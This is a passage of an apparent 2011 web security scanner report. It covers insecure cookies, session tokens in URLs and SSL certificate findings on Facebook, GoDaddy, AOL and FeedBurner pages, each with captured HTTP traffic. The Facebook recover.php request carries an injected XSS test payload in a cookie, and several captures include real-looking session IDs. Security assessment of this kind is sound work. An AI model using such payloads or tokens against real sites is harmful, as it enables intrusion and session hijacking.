Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.26. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.27. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

10.28. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


10.29. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


11. Session token in URL
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://aolmobile.aol.com/registration/include/registration_unified.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolmobile.aol.com
Path:   /registration/include/registration_unified.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /registration/include/registration_unified.css;jsessionid=31CD361837F0D202F18D7692A6450835.worker1 HTTP/1.1
Host: aolmobile.aol.com
Proxy-Connection: keep-alive
Referer: http://aolmobile.aol.com/registration/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:31 GMT
Server: Apache
ETag: W/"14864-1302733922000"
Last-Modified: Wed, 13 Apr 2011 22:32:02 GMT
Cteonnt-Length: 14864
Content-Type: text/css
Content-Length: 14864

/*
Unified Mobile Registration .css file. There were 3 different files, aim, full, and reg.
Because of the embedded modal registration dialog we needed to combine these
into 1 file.
*/

/*
Common
*/
...[SNIP]...

11.2. http://aolmobile.aol.com/registration/welcome

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolmobile.aol.com
Path:   /registration/welcome

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /registration/welcome HTTP/1.1
Host: aolmobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575079886-Repeat%7C1367647079886%3B%20s_nrgvo%3DRepeat%7C1367647079887%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F6D3C0A981129FC794BD4887C56F1DB.worker1; Path=/registration
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 14044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <title>
...[SNIP]...
<meta http-equiv="cache-control" content="no-cache"/>

   <link type="text/css" rel="stylesheet" media="screen" href="/registration/include/registration_unified.css;jsessionid=8F6D3C0A981129FC794BD4887C56F1DB.worker1"/>

   
   <script src="/registration/include/jquery-1.5.1.min.js" type="text/javascript">
...[SNIP]...

11.3. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolproductcentral.aol.com
Path:   /category/pc-tools-and-storage/aol-computer-checkup/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /category/pc-tools-and-storage/aol-computer-checkup/ HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=A72440ECFE31D381E77E9A5CDEE16DE0.storefrontus-m03a; Path=/
Set-Cookie: OFBiz.Visitor=2832974; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 33251
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Begin Screen component://gps/widget/gpsScreens.xml#product -->
<!-- Beg
...[SNIP]...
<!-- PRICE END-->
                               <a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=A72440ECFE31D381E77E9A5CDEE16DE0.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup" class="tryitforfree" title="TRY IT FREE">TRY IT FREE</a>
...[SNIP]...

11.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolproductcentral.aol.com
Path:   /category/pc-tools-and-storage/aol-quick-check-live/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /category/pc-tools-and-storage/aol-quick-check-live/ HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=10AA523C61D66A8550447791F0919E9D.storefrontus-m03a; Path=/
Set-Cookie: OFBiz.Visitor=2832975; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 29919
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Begin Screen component://gps/widget/gpsScreens.xml#product -->
<!-- Beg
...[SNIP]...
<!-- PRICE END-->
                               <a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=10AA523C61D66A8550447791F0919E9D.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-quick-check-live-1" class="tryitforfree" title="PURCHASE NOW">PURCHASE NOW</a>
...[SNIP]...

11.5. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 10:53:03 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=QCfNUmJbZJu2SDH5i0eLiw; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Thu, 05 May 2011 10:53:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=QCfNUmJbZJu2SDH5i0eLiw">FeedBurner</a>
...[SNIP]...
<div id="footer">
&copy;2004&ndash;2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=QCfNUmJbZJu2SDH5i0eLiw">Terms of Service</a>
...[SNIP]...

11.6. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://new.aol.com
Path:   /productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do;jsessionid=396B36FE79F207ADC209410F3E2A4D38.prodwrp-d10 HTTP/1.1
Host: new.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=396B36FE79F207ADC209410F3E2A4D38.prodwrp-d10; s_pers=%20s_getnr%3D1304575117715-Repeat%7C1367647117715%3B%20s_nrgvo%3DRepeat%7C1367647117717%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 420 unused
Date: Thu, 05 May 2011 01:03:51 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 09:52:45 GMT
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/html

<html>

<body>

<h2>Whew!</h2>

<h4>Thanks for putting 110% into signing up for AOL accounts.</h4>

<p>Love your passion! We'd also love a quick break to process your requests. Take a breather. Maybe
...[SNIP]...

11.7. http://weather.aol.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://weather.aol.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: weather.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0EB8EBCCF31C64980E700F996CC0E5F8; Path=/
Set-Cookie: wttempunit=f; Expires=Sat, 04-May-2013 10:56:16 GMT; Path=/
Keep-Alive: timeout=5, max=30
Connection: Keep-Alive
Content-Length: 50826


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">


<head
...[SNIP]...
<h2><a href="/mycities;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">My Cities</a>
...[SNIP]...
<li class="tempUnitSelFJSH degF current" title="Fahrenheit"><a href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8" id="mctFahUnit" class="tempValJSH tuSelFJSH">&deg;F</a>
...[SNIP]...
<li class="tempUnitSelCJSH degC" title="Celsius"><a href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8" id="mctCelUnit" class="tempValJSH tuSelCJSH">&deg;C</a>
...[SNIP]...
<div class="seeall"><a href="/mycities;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">See All</a>
...[SNIP]...
<li class="current">
               <a class="cloud nationalMap" href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Cloud</a>
...[SNIP]...
<li class="browse">
           <a href="/weather-maps/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Browse All Maps</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/asia/china/beijing/beijing/id/chxx0008;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Beijing weather</a>
...[SNIP]...
<p class="cityLink"><a title="Not Available" href="/forecast/todays/south-america/argentina/buenos-aires/buenos-aires/id/arba0009;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Buenos Aires weather</a>
...[SNIP]...
<p class="cityLink"><a title="Haze" href="/forecast/todays/africa/egypt/cairo/id/egxx0004;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Cairo weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/europe/turkey/istanbul/id/tuxx0014;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Istanbul weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/asia/indonesia/jakarta/id/idxx0022;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Jakarta weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/united-kingdom/england/london/id/ukxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">London weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Clear" href="/forecast/todays/usa/california/los-angeles/id/usca0638;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Los Angeles weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/spain/madrid/id/spxx0050;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Madrid weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/asia/philippines/manila/id/rpxx0017;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Manila weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/central-america/mexico/distro-federal/mexico-city/id/mxdf0132;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Mexico City weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/russia/moskovskaya/moscow/id/rsxx0063;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Moscow weather</a>
...[SNIP]...
<p class="cityLink"><a title="Haze" href="/forecast/todays/asia/india/new-delhi/id/inxx0096;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">New Delhi weather</a>
...[SNIP]...
<p class="cityLink"><a title="Cloudy" href="/forecast/todays/usa/new-york/new-york/id/usny0996;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">New York weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/france/paris/id/frxx0076;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Paris weather</a>
...[SNIP]...
<p class="cityLink"><a title="Fog" href="/forecast/todays/south-america/brazil/sao-paulo/sao-paulo/id/brxx0232;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Sao Paulo weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/asia/south-korea/seoul/id/ksxx0037;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Seoul weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/australia/sydney/id/asxx0112;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Sydney weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/asia/japan/tokyo/id/jaxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Tokyo weather</a>
...[SNIP]...
<p class="more"><a href="/world;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Browse the World</a>
...[SNIP]...

11.8. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

12. SSL certificate
There are 19 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



12.1. https://secure.opinionlab.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.opinionlab.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Jun 15 19:00:00 CDT 2009
Valid to:  Mon Jul 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
